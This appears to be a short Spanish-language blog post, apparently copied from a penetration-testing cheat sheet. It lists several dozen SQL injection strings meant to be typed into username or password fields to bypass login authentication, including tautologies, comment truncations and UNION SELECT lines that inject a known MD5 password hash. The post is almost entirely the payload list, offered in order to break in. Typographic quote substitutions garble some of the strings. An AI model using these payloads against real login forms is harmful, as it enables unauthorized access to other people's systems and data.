Si queremos saltarnos la autenticacion o un formuario podemos probar con las siguientes conbinaciones en usuario o contraseña y con suerte entraremos (sacado de penetration testing lab, link al final):

or 1=1
or 1=1–
or 1=1#
or 1=1/*
admin’ —
admin’ #
admin’/*
admin’ or ‘1’=’1
admin’ or ‘1’=’1′–
admin’ or ‘1’=’1’#
admin’ or ‘1’=’1’/*
admin’or 1=1 or »=’
admin’ or 1=1
admin’ or 1=1–
admin’ or 1=1#
admin’ or 1=1/*
admin’) or (‘1’=’1
admin’) or (‘1’=’1′–
admin’) or (‘1’=’1’#
admin’) or (‘1’=’1’/*
admin’) or ‘1’=’1
admin’) or ‘1’=’1′–
admin’) or ‘1’=’1’#
admin’) or ‘1’=’1’/*
1234 ‘ AND 1=0 UNION ALL SELECT ‘admin’, ’81dc9bdb52d04dc20036dbd8313ed055
admin» —
admin» #
admin»/*
admin» or «1»=»1
admin» or «1»=»1″–
admin» or «1»=»1″#
admin» or «1»=»1″/*
admin»or 1=1 or «»=»
admin» or 1=1
admin» or 1=1–
admin» or 1=1#
admin» or 1=1/*
admin») or («1″=»1
admin») or («1″=»1″–
admin») or («1″=»1″#
admin») or («1″=»1″/*
admin») or «1»=»1
admin») or «1»=»1″–
admin») or «1»=»1″#
admin») or «1»=»1″/*
1234 » AND 1=0 UNION ALL SELECT «admin», «81dc9bdb52d04dc20036dbd8313ed055

 

Sacado de: https://pentestlab.wordpress.com/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/